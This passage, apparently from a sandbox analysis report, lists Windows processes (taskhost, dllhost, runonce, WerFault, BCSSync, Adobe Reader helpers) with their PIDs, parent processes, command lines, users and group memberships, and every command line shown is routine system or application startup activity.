0x504 Thread: id = 459 os_tid = 0x50c Thread: id = 460 os_tid = 0x510 Thread: id = 463 os_tid = 0x518 Thread: id = 473 os_tid = 0x544 Thread: id = 474 os_tid = 0x548 Thread: id = 475 os_tid = 0x54c Thread: id = 476 os_tid = 0x550 Thread: id = 483 os_tid = 0x570 Thread: id = 526 os_tid = 0x614 Thread: id = 530 os_tid = 0x62c Thread: id = 533 os_tid = 0x638 Thread: id = 535 os_tid = 0x640 Thread: id = 537 os_tid = 0x648 Thread: id = 540 os_tid = 0x654 Thread: id = 541 os_tid = 0x65c Thread: id = 544 os_tid = 0x664 Thread: id = 579 os_tid = 0x6f8 Process: id = "45" image_name = "taskhost.exe" filename = "c:\\windows\\system32\\taskhost.exe" page_root = "0xdc3d000" os_pid = "0x620" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x1a4" cmd_line = "taskhost.exe SYSTEM" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 567 os_tid = 0x624 Thread: id = 570 os_tid = 0x6c8 Thread: id = 571 os_tid = 0x6cc Thread: id = 593 os_tid = 0x6d4 Thread: id = 594 os_tid = 0x6d0 Thread: id = 626 os_tid = 0x7c0 Thread: id = 628 os_tid = 0x7c8 Process: id = "46" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x77e1c000" os_pid = "0x680" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d24f" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 551 os_tid = 0x684 Thread: id = 555 os_tid = 0x690 Thread: id = 556 os_tid = 0x694 Thread: id = 558 os_tid = 0x69c Thread: id = 559 os_tid = 0x6a0 Thread: id = 560 os_tid = 0x6a4 Thread: id = 561 os_tid = 0x6a8 Process: id = "47" image_name = "runonce.exe" filename = "c:\\windows\\system32\\runonce.exe" page_root = "0x7876f000" os_pid = "0x6e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x2f4" cmd_line = "runonce.exe /Explorer" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 575 os_tid = 0x6e8 Thread: id = 577 os_tid = 0x6f0 Thread: id = 578 os_tid = 0x6f4 Thread: id = 580 os_tid = 0x6fc Thread: id = 581 os_tid = 0x700 Process: id = "48" image_name = "werfault.exe" filename = "c:\\windows\\system32\\werfault.exe" page_root = "0x759ff000" os_pid = "0x704" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "47" os_parent_pid = "0x6e4" cmd_line = "\"C:\\Windows\\System32\\WerFault.exe\" -k -rq" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 583 os_tid = 0x708 Process: id = "49" image_name = "werfault.exe" filename = "c:\\windows\\system32\\werfault.exe" page_root = "0x74bc8000" os_pid = "0x70c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x704" cmd_line = "C:\\Windows\\System32\\WerFault.exe -k -q" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 584 os_tid = 0x710 Process: id = "50" image_name = "bcssync.exe" filename = "c:\\program files\\microsoft office\\office14\\bcssync.exe" page_root = "0x73ffd000" os_pid = "0x784" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x2f4" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe\" /DelayServices" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 615 os_tid = 0x788 Process: id = "51" image_name = "runonce.exe" filename = "c:\\windows\\syswow64\\runonce.exe" page_root = "0x73703000" os_pid = "0x78c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x2f4" cmd_line = "C:\\Windows\\SysWOW64\\runonce.exe /Run6432" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 616 os_tid = 0x790 Thread: id = 623 os_tid = 0x7b4 Thread: id = 624 os_tid = 0x7b8 Thread: id = 631 os_tid = 0x7d8 Thread: id = 632 os_tid = 0x7dc Process: id = "52" image_name = "reader_sl.exe" filename = "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\reader_sl.exe" page_root = "0x71569000" os_pid = "0x7e4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\reader_sl.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 634 os_tid = 0x7e8 Thread: id = 637 os_tid = 0x7f8 Thread: id = 638 os_tid = 0x7fc Process: id = "53" image_name = "adobearm.exe" filename = "c:\\program files (x86)\\common files\\adobe\\arm\\1.0\\adobearm.exe" page_root = "0x72594000" os_pid = "0x7f0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe\" " cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 636 os_tid = 0x7f4 Thread: id = 639 os_tid = 0x404 Thread: id = 644 os_tid = 0x168 Process: id = "54" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x6ecbc000" os_pid = "0x13c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e992" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 647 os_tid = 0x120 Thread: id = 651 os_tid = 0x100 Thread: id = 654 os_tid = 0x4d8 Thread: id = 655 os_tid = 0x4fc Thread: id = 656 os_tid = 0x360 Thread: id = 657 os_tid = 0x364